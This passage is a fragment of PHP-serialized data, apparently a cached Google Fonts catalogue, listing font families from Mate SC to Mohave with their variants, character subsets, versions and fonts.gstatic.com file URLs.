TjftRd7WZ6z-2XqfXeLVdbw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:728;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Mate SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/matesc/v21/-nF8OGQ1-uoVr2wKyiXZ95OkJwA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:729;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Maven Pro\";s:8:\"variants\";a:6:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v32\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":6:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/mavenpro/v32/7Auup_AqnyWWAxW2Wk3swUz56MS91Eww8SX25nCpozp5GvU.ttf\";s:3:\"500\";s:91:\"http://fonts.gstatic.com/s/mavenpro/v32/7Auup_AqnyWWAxW2Wk3swUz56MS91Eww8Rf25nCpozp5GvU.ttf\";s:3:\"600\";s:91:\"http://fonts.gstatic.com/s/mavenpro/v32/7Auup_AqnyWWAxW2Wk3swUz56MS91Eww8fvx5nCpozp5GvU.ttf\";s:3:\"700\";s:91:\"http://fonts.gstatic.com/s/mavenpro/v32/7Auup_AqnyWWAxW2Wk3swUz56MS91Eww8cLx5nCpozp5GvU.ttf\";s:3:\"800\";s:91:\"http://fonts.gstatic.com/s/mavenpro/v32/7Auup_AqnyWWAxW2Wk3swUz56MS91Eww8aXx5nCpozp5GvU.ttf\";s:3:\"900\";s:91:\"http://fonts.gstatic.com/s/mavenpro/v32/7Auup_AqnyWWAxW2Wk3swUz56MS91Eww8Yzx5nCpozp5GvU.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:730;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"McLaren\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/mclaren/v13/2EbnL-ZuAXFqZFXISYYf8z2Yt_c.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:731;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Mea Culpa\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:73:\"http://fonts.gstatic.com/s/meaculpa/v3/AMOTz4GcuWbEIuza8jsZms0QW3mqyg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:732;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Meddon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/meddon/v20/kmK8ZqA2EgDNeHTZhBdB3y_Aow.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:733;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"MedievalSharp\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/medievalsharp/v24/EvOJzAlL3oU5AQl2mP5KdgptAq96MwvXLDk.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:734;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Medula One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/medulaone/v19/YA9Wr0qb5kjJM6l2V0yukiEqs7GtlvY.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:735;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Meera Inimai\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:5:\"tamil\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/meerainimai/v12/845fNMM5EIqOW5MPuvO3ILep_2jDVevnLQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:736;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Megrim\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/megrim/v16/46kulbz5WjvLqJZlbWXgd0RY1g.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:737;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Meie Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/meiescript/v21/_LOImzDK7erRjhunIspaMjxn5IXg0WDz.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:738;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Meow Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/meowscript/v5/0FlQVPqanlaJrtr8AnJ0ESch0_0CfDf1.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:739;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Merienda\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/merienda/v14/gNMHW3x8Qoy5_mf8uVMCOou6_dvg.ttf\";s:3:\"700\";s:76:\"http://fonts.gstatic.com/s/merienda/v14/gNMAW3x8Qoy5_mf8uWu-Fa-y1sfpPES4.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:740;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Merienda One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/meriendaone/v16/H4cgBXaMndbflEq6kyZ1ht6YgoyyYzFzFw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:741;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Merriweather\";s:8:\"variants\";a:8:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"900\";i:7;s:9:\"900italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v30\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"300\";s:86:\"http://fonts.gstatic.com/s/merriweather/v30/u-4n0qyriQwlOrhSvowK_l521wRpX837pvjxPA.ttf\";s:9:\"300italic\";s:88:\"http://fonts.gstatic.com/s/merriweather/v30/u-4l0qyriQwlOrhSvowK_l5-eR7lXcf_hP3hPGWH.ttf\";s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/merriweather/v30/u-440qyriQwlOrhSvowK_l5OeyxNV-bnrw.ttf\";s:6:\"italic\";s:84:\"http://fonts.gstatic.com/s/merriweather/v30/u-4m0qyriQwlOrhSvowK_l5-eSZJdeP3r-Ho.ttf\";s:3:\"700\";s:86:\"http://fonts.gstatic.com/s/merriweather/v30/u-4n0qyriQwlOrhSvowK_l52xwNpX837pvjxPA.ttf\";s:9:\"700italic\";s:88:\"http://fonts.gstatic.com/s/merriweather/v30/u-4l0qyriQwlOrhSvowK_l5-eR71Wsf_hP3hPGWH.ttf\";s:3:\"900\";s:86:\"http://fonts.gstatic.com/s/merriweather/v30/u-4n0qyriQwlOrhSvowK_l52_wFpX837pvjxPA.ttf\";s:9:\"900italic\";s:88:\"http://fonts.gstatic.com/s/merriweather/v30/u-4l0qyriQwlOrhSvowK_l5-eR7NWMf_hP3hPGWH.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:742;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Merriweather Sans\";s:8:\"variants\";a:12:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:9:\"300italic\";i:7;s:6:\"italic\";i:8;s:9:\"500italic\";i:9;s:9:\"600italic\";i:10;s:9:\"700italic\";i:11;s:9:\"800italic\";}s:7:\"subsets\";a:4:{i:0;s:12:\"cyrillic-ext\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":12:{s:3:\"300\";s:110:\"http://fonts.gstatic.com/s/merriweathersans/v22/2-cO9IRs1JiJN1FRAMjTN5zd9vgsFF_5asQTb6hZ2JKZ_O4ljuEG7xFHnQ.ttf\";s:7:\"regular\";s:110:\"http://fonts.gstatic.com/s/merriweathersans/v22/2-cO9IRs1JiJN1FRAMjTN5zd9vgsFF_5asQTb6hZ2JKZou4ljuEG7xFHnQ.ttf\";s:3:\"500\";s:110:\"http://fonts.gstatic.com/s/merriweathersans/v22/2-cO9IRs1JiJN1FRAMjTN5zd9vgsFF_5asQTb6hZ2JKZkO4ljuEG7xFHnQ.ttf\";s:3:\"600\";s:110:\"http://fonts.gstatic.com/s/merriweathersans/v22/2-cO9IRs1JiJN1FRAMjTN5zd9vgsFF_5asQTb6hZ2JKZfOkljuEG7xFHnQ.ttf\";s:3:\"700\";s:110:\"http://fonts.gstatic.com/s/merriweathersans/v22/2-cO9IRs1JiJN1FRAMjTN5zd9vgsFF_5asQTb6hZ2JKZRekljuEG7xFHnQ.ttf\";s:3:\"800\";s:110:\"http://fonts.gstatic.com/s/merriweathersans/v22/2-cO9IRs1JiJN1FRAMjTN5zd9vgsFF_5asQTb6hZ2JKZIukljuEG7xFHnQ.ttf\";s:9:\"300italic\";s:112:\"http://fonts.gstatic.com/s/merriweathersans/v22/2-cM9IRs1JiJN1FRAMjTN5zd9vgsFHXwWDvLBsPDdpWMaq2TzesCzRRXnaur.ttf\";s:6:\"italic\";s:112:\"http://fonts.gstatic.com/s/merriweathersans/v22/2-cM9IRs1JiJN1FRAMjTN5zd9vgsFHXwWDvLBsPDdpWMaq3NzesCzRRXnaur.ttf\";s:9:\"500italic\";s:112:\"http://fonts.gstatic.com/s/merriweathersans/v22/2-cM9IRs1JiJN1FRAMjTN5zd9vgsFHXwWDvLBsPDdpWMaq3_zesCzRRXnaur.ttf\";s:9:\"600italic\";s:112:\"http://fonts.gstatic.com/s/merriweathersans/v22/2-cM9IRs1JiJN1FRAMjTN5zd9vgsFHXwWDvLBsPDdpWMaq0TyusCzRRXnaur.ttf\";s:9:\"700italic\";s:112:\"http://fonts.gstatic.com/s/merriweathersans/v22/2-cM9IRs1JiJN1FRAMjTN5zd9vgsFHXwWDvLBsPDdpWMaq0qyusCzRRXnaur.ttf\";s:9:\"800italic\";s:112:\"http://fonts.gstatic.com/s/merriweathersans/v22/2-cM9IRs1JiJN1FRAMjTN5zd9vgsFHXwWDvLBsPDdpWMaq1NyusCzRRXnaur.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:743;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Metal\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v28\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/metal/v28/lW-wwjUJIXTo7i3nnoQAUdN2.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:744;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Metal Mania\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/metalmania/v22/RWmMoKWb4e8kqMfBUdPFJeXCg6UKDXlq.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:745;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Metamorphous\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/metamorphous/v18/Wnz8HA03aAXcC39ZEX5y1330PCCthTsmaQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:746;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Metrophobic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:79:\"http://fonts.gstatic.com/s/metrophobic/v19/sJoA3LZUhMSAPV_u0qwiAT-J737FPEEL.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:747;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Michroma\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/michroma/v16/PN_zRfy9qWD8fEagAMg6rzjb_-Da.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:748;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Milonga\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/milonga/v20/SZc53FHnIaK9W5kffz3GkUrS8DI.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:749;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Miltonian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v26\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/miltonian/v26/zOL-4pbPn6Ne9JqTg9mr6e5As-FeiQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:750;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Miltonian Tattoo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v28\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/miltoniantattoo/v28/EvOUzBRL0o0kCxF-lcMCQxlpVsA_FwP8MDBku-s.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:751;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Mina\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:7:\"bengali\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/mina/v11/-nFzOGc18vARrz9j7i3y65o.ttf\";s:3:\"700\";s:67:\"http://fonts.gstatic.com/s/mina/v11/-nF8OGc18vARl4NMyiXZ95OkJwA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:752;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Mingzat\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:6:\"lepcha\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-06-28\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/mingzat/v1/0QIgMX5C-o-oWWyvBttkm_mv670.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:753;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Miniver\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/miniver/v21/eLGcP-PxIg-5H0vC770Cy8r8fWA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:754;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Miriam Libre\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:6:\"hebrew\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/miriamlibre/v13/DdTh798HsHwubBAqfkcBTL_vYJn_Teun9g.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/miriamlibre/v13/DdT-798HsHwubBAqfkcBTL_X3LbbRcC7_-Z7Hg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:755;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Mirza\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/mirza/v15/co3ImWlikiN5EurdKMewsrvI.ttf\";s:3:\"500\";s:69:\"http://fonts.gstatic.com/s/mirza/v15/co3FmWlikiN5EtIpAeO4mafBomDi.ttf\";s:3:\"600\";s:69:\"http://fonts.gstatic.com/s/mirza/v15/co3FmWlikiN5EtIFBuO4mafBomDi.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/mirza/v15/co3FmWlikiN5EtJhB-O4mafBomDi.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:756;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Miss Fajardose\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/missfajardose/v22/E21-_dn5gvrawDdPFVl-N0Ajb8qvWPaJq4no.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:757;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Mitr\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"200\";s:67:\"http://fonts.gstatic.com/s/mitr/v11/pxiEypw5ucZF8fMZFJDUc1NECPY.ttf\";s:3:\"300\";s:67:\"http://fonts.gstatic.com/s/mitr/v11/pxiEypw5ucZF8ZcaFJDUc1NECPY.ttf\";s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/mitr/v11/pxiLypw5ucZFyTsyMJj_b1o.ttf\";s:3:\"500\";s:67:\"http://fonts.gstatic.com/s/mitr/v11/pxiEypw5ucZF8c8bFJDUc1NECPY.ttf\";s:3:\"600\";s:67:\"http://fonts.gstatic.com/s/mitr/v11/pxiEypw5ucZF8eMcFJDUc1NECPY.ttf\";s:3:\"700\";s:67:\"http://fonts.gstatic.com/s/mitr/v11/pxiEypw5ucZF8YcdFJDUc1NECPY.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:758;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Mochiy Pop One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:8:\"japanese\";i:1;s:5:\"latin\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/mochiypopone/v7/QdVPSTA9Jh-gg-5XZP2UmU4O9kwwD3s6ZKAi.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:759;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Mochiy Pop P One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:8:\"japanese\";i:1;s:5:\"latin\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/mochiypoppone/v7/Ktk2AKuPeY_td1-h9LayHYWCjAqyN4O3WYZB_sU.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:760;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Modak\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/modak/v18/EJRYQgs1XtIEsnMH8BVZ76KU.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:761;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Modern Antiqua\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/modernantiqua/v22/NGStv5TIAUg6Iq_RLNo_2dp1sI1Ea2u0c3Gi.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:762;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Mogra\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"gujarati\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/mogra/v19/f0X40eSs8c95TBo4DvLmxtnG.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:763;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Mohave\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:9:\"300italic\";i:6;s:6:\"italic\";i:7;s:9:\"500italic\";i:8;s:9:\"600italic\";i:9;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":10:{s:3:\"300\";s:84:\"http://fonts.gstatic.com/s/mohave/v8/7cH0v4ksjJunKqMVAOPIMOeSmiojdif_HvCQopLSvBk.ttf\";s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/mohave/v8/7cH0v4ksjJunKqMVAOPIMOeSmiojdnn_HvCQopLSvBk.ttf\";s:3:\"500\";s:84:\"http://fonts.g